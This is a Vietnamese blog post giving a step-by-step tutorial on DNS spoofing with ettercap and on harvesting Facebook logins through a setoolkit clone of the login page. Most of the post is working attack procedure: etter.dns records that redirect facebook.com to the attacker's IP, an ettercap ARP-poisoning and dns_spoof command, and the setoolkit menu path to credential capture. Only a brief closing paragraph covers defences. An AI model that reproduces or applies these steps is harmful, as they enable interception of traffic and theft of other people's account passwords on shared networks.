Mình xin nói sơ qua về DNS – Domain Name System – Hệ thống phân giải tên miền.
Khi bạn vào web browser gõ facebook.com thì hệ thống DNS sẽ phân giải cho bạn sang địa chỉ IP để bạn có thể giao tiếp, truyền tải dữ liệu trên mạng.
Bài này mình sẽ chia làm 2 phần:
Phần 1: Sử dụng ettercap để thực hiện DNS Spoofing
Phần 2: Sử dụng Setoolkit và Ettercap để thực hiện đánh cắp tài khoản facebook.
Thực hiện:
Phần 1: Sử dụng ettercap để thực hiện DNS Spoofing
Trước tiên, mình sẽ ping facebook.com xem thử địa chỉ IP tương ứng với tên miền facebook.com là gì
 photo facebook_zpsf1b7f07c.jpg
Tiếp đến, vào Kali Linux thực hiện Enable IP Forwarding.
#echo 1 > /proc/sys/net/ipv4/ip_forward
 photo ipforwarding_zps9e90c910.jpg
Tiếp theo sửa file etter.dns.
Sử dụng câu lệnh locate etter.dns xem hiện tại nó đang ở đâu. Xong thì tiến hành vào thêm các record sau:
facebook.com A 192.168.0.109
*.facebook.com A 192.168.0.109
Với địa chỉ 192.168.0.109 là IP máy Attacker.
 photo etterdns_zps6db36b10.jpg
Note: Có thể nằm ở địa chỉ /usr/local/share/ettercap/etter.dns với các phiên bản Backtrack 5
Xong thì lưu lại và thoát :wq
 photo facebook2_zpscdfe6288.jpg
Thực hiện dns spoofing bằng câu lệnh
#ettercap -T -q -M arp:remote -P dns_spoof //
 photo ettercap_zpsac23a3f7.jpg
Sau đó vào máy client, cấp lại địa chỉ bằng câu lệnh >ipconfig /renew
 photo ettercap3_zps6c7aa75f.jpg
Bây giờ lên PC client truy cập vào facebook.com bạn sẽ thấy nó vẫn truy cập bình thường. Nhưng khi tiến hành ping đến facebook.com thì IP trả lời lại là 192.168.0.109 – IP máy Attacker.
 photo pingfacebook2_zps52486770.jpg
OK. Vậy là bạn đã thành công trong việc lái dữ liệu qua máy bạn, giờ chúng ta sẽ tiến hành đánh cắp tài khoản Facebook.
Phần 2: Sử dụng setoolkit và ettercap để thực hiện đánh cắp tài khoản facebook.
Công cụ sử dụng:
setoolkit: clone website, capture username/password
ettercap: Scan hosts + ARP poisoning (ARP spoofing) + DNS spoofing + Sniff (nghe lén).
Video demo: 


Hướng dẫn bằng hình ảnh
Bật setoolkit
#/usr/share/set/setoolkit
Đồng ý điều khoản sử dụng Bấm y -> Enter
 photo setoolkit2_zps3d0fa4a2.jpg
Chọn 1) Social-Engineering Attacks
 photo setoolkit3_zps2970c553.jpg
Chọn 2) Website Attack Ventors

Chọn 3) Credential Harvester Attack Method


Chọn 2) Site Cloner
Đánh địa chỉ IP của Attacker: 192.168.0.109
Đánh đường dẫn muốn clone website: https://www.facebook.com
Xong thì bật Terminal khác, đánh ettercap -G để bật cấu hình ettercap bằng giao diện
Chọn Sniff-> Unified sniffing
Chọn cổng để nghe lén: eth0
Chọn Hosts-> Scan for hosts
Host-> Hosts List
Chọn 2 địa chỉ để tiến hành nghe lén
Thực hiện ARP possoning (ARP spoofing)
Click chọn Sniff remote connections.
Vào /etc/ettercap/etter.dns thêm vào 2 dòng:
facebook.com A 192.168.0.109
*.facebook.com A 192.168.0.109
Vào Plugins-> Manage the plugins
Click vào dns_spoof để bật tính năng này
Start sniffing
Tại máy client mở web browser vào facebook.com, điền username/password
setoolkit sẽ bắt được username/password này
Thông tin username/password hiện dưới dạng clear-text như trên, vậy là bạn đã có tài khoản facebook của client.
Cập nhật ngày 15/9/2015:
Ở phiên bản mới Kali 2.0, khi clone site về sẽ được lưu trong đường dẫn /var/www/ bạn tiến hành copy những file này vào đường dẫn /var/www/html sau đó tiến hành bình thường:
Note: nhớ change quyền để đọc và viết cho các file này:
#cd /var/www/html
#chmod 777 ./*
gồm 3 file là:
– index.html : giao diện của facebook.com
– post.php: hàm để lấy username/password khi bạn nhập vào và lưu ở file haverster_*.txt
– harvester_ngày_giờ.txt : lưu thông tin thu được.
 photo clone1.png
Bằng cách tương tự các bạn có thể đánh cắp nhiều tài khoản khác.
Cách phòng chống DNS Spoofing:
Ngoài 2 cách ở bài ARP spoofing là triển khai port-security và DAI các bạn nên triển khai thêm DHCP snooping để ngăn chặn cấp DHCP giả mạo.
P/s: Như các bạn đã thấy, nếu attacker đã vào được trong mạng nội bộ của chúng ta mà có ý đồ đen tối thì có nhiều công cụ để khai khác thông tin của công ty mình. Như vậy, nếu nhân viên nào có ý đồ phá hoại công ty thì cũng khá vất vả để điều tra.
Nhân tiện đây, bạn nào có sử dụng công cụ hay chương trình giám sát nào bổ ích thì chia sẻ cho anh em biết với nhé.
Thân,

Axact

Administrator:

Xin chào, tôi là Nguyễn Quý Quang Huy. Tôi 14 tuổi và sinh sống tại Hoài Đức, Hà Nội. Tôi lập ra Rinne-IT Blog này nhằm chia sẻ những kiến thức mình có và những bài viết hay trên mạng do tôi tổng hợp. Blog đang trong giai đoạn phát triển nên nếu có lỗi mong các bạn bỏ qua. Tôi luôn chào đón những ý kiến phát triển từ từ các bạn. Giờ thì hãy khám phá blog của tôi nào ^_^

Bình Luận:

0 bình luận: